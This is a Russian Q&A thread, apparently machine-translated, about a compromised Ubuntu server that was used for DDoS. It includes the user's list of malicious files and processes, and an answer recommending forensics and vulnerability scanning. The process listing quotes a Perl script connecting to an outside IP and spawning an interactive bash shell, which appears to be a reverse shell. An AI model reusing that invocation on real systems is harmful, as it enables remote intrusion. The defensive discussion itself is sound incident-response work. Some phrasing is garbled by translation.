1

У меня работает сервер Ubuntu. Сегодня я обнаружил, что сервер был взломан и используется для DDoS через сообщение о нарушении Amazon.

Я нашел следующие вещи на сервере.

Следующие подозрительные файлы, где есть на сервере.

-rw-r--r-- 1 www-data www-data      759 Dec 21 15:38 weiwei.pl
-rwxrwxrwx 1 www-data www-data  1223123 Dec 26 02:20 huizhen
-rwxr-xr-x 1 www-data www-data        5 Jan 26 14:21 gates.lod
-rwxrwxrwx 1 www-data www-data  1135000 Jan 27 14:09 sishen
-rw-r--r-- 1 www-data www-data      759 Jan 27 14:36 weiwei.pl.5
-rw-r--r-- 1 www-data www-data      759 Jan 27 14:36 weiwei.pl.4
-rw-r--r-- 1 www-data www-data      759 Jan 27 14:36 weiwei.pl.3
-rw-r--r-- 1 www-data www-data      759 Jan 27 14:36 weiwei.pl.2
-rw-r--r-- 1 www-data www-data      759 Jan 27 14:36 weiwei.pl.1
-rwxr-xr-x 1 www-data www-data        5 Jan 28 14:00 vga.conf
-rw-r--r-- 1 www-data www-data      119 Jan 29 06:22 cmd.n
-rw-r--r-- 1 www-data www-data       73 Feb  1 01:01 conf.n

Следующий процесс был запущен

www-data  8292 10629  0 Jan28 ?        00:00:00 perl /tmp/weiwei.pl 222.186.42.207 5222
www-data  8293  8292  0 Jan28 ?        00:00:00 /bin/bash -i
www-data  8293  8292  0 Jan28 ?        00:00:00 ./huizhen

Я запустил clamav и он удалил файлы /tmp/huizhen и /tmp/sishen но процессы по-прежнему работали с weiwei.pl и ./huizhen поэтому я убил их вручную.

У меня на сервере работают следующие сервисы.

  • SSH - не используется порт 22 по умолчанию, только аутентификация по ключу
  • MongoDB - Порт открыт для определенной группы безопасности
  • Memcache - порт открыт для определенной группы безопасности
  • NodeJS - Порт открыт для определенной группы безопасности
  • Tomcat - порты 8080/8443 общедоступны для веб-службы axis2 и solr.

Я предполагаю, что хакер попал через какую-то уязвимость tomcat/axis2/solr, потому что процесс выполняется с использованием той же группы пользователей, что и tomcat.

На данный момент я заблокировал 8080/8443 порты и буду заменять сервер новым. Tomcat будет доступен с другого сервера через nginx. Я также установил исправления безопасности с помощью автоматических обновлений.

Проблема в том, как узнать, как хакер проник и посадил троянов. Какие еще шаги я могу предпринять для усиления безопасности.

1 ответ1

1

Это довольно резонный вопрос. Строго говоря, лучшим вариантом для ответа было бы заморозить вашу систему и провести судебно-медицинскую экспертизу. Любое последующее вмешательство с вашей стороны, включая удаление вируса, изменит и, возможно, сотрет любую крошку хлеба, оставленную злоумышленником.

Не Учитывая , что этот путь не открыты для вас, лучше всего использовать сканер уязвимостей, программу ИЭ , предназначенную именно для того , чтобы стресс-тестирования вашей установки. Есть очень много, вы можете просто Google термин Vulnerability Scanner , но на сегодняшний день самым известным является Nessus. Он поставляется в нескольких версиях, от бесплатных до платных с разными лицензиями, и может стать довольно дорогим, возможно, больше, чем вы готовы раскошелиться.

Тем не менее, есть и бесплатная версия, которая предустановлена на Kali Linux. Вам придется зарегистрировать его, даже если он абсолютно бесплатный. Многие из нас используют Kali, устанавливая его на виртуальную машину на ноутбуке, а затем проводят стресс-тесты за пределами наших домов, чтобы увидеть, какие дефекты (= не исправленные, известные уязвимости, чаще всего) остаются в приложениях, работающих на Интернет-сервер.

Существуют руководства, в которых вы узнаете, как использовать это по всему Интернету, и вы можете попробовать это также в своей локальной сети (если вы доверяете брандмауэру) и даже на том же компьютере, если вы будете использовать Kali в качестве виртуальной машины.

Всё ещё ищете ответ? Посмотрите другие вопросы с метками .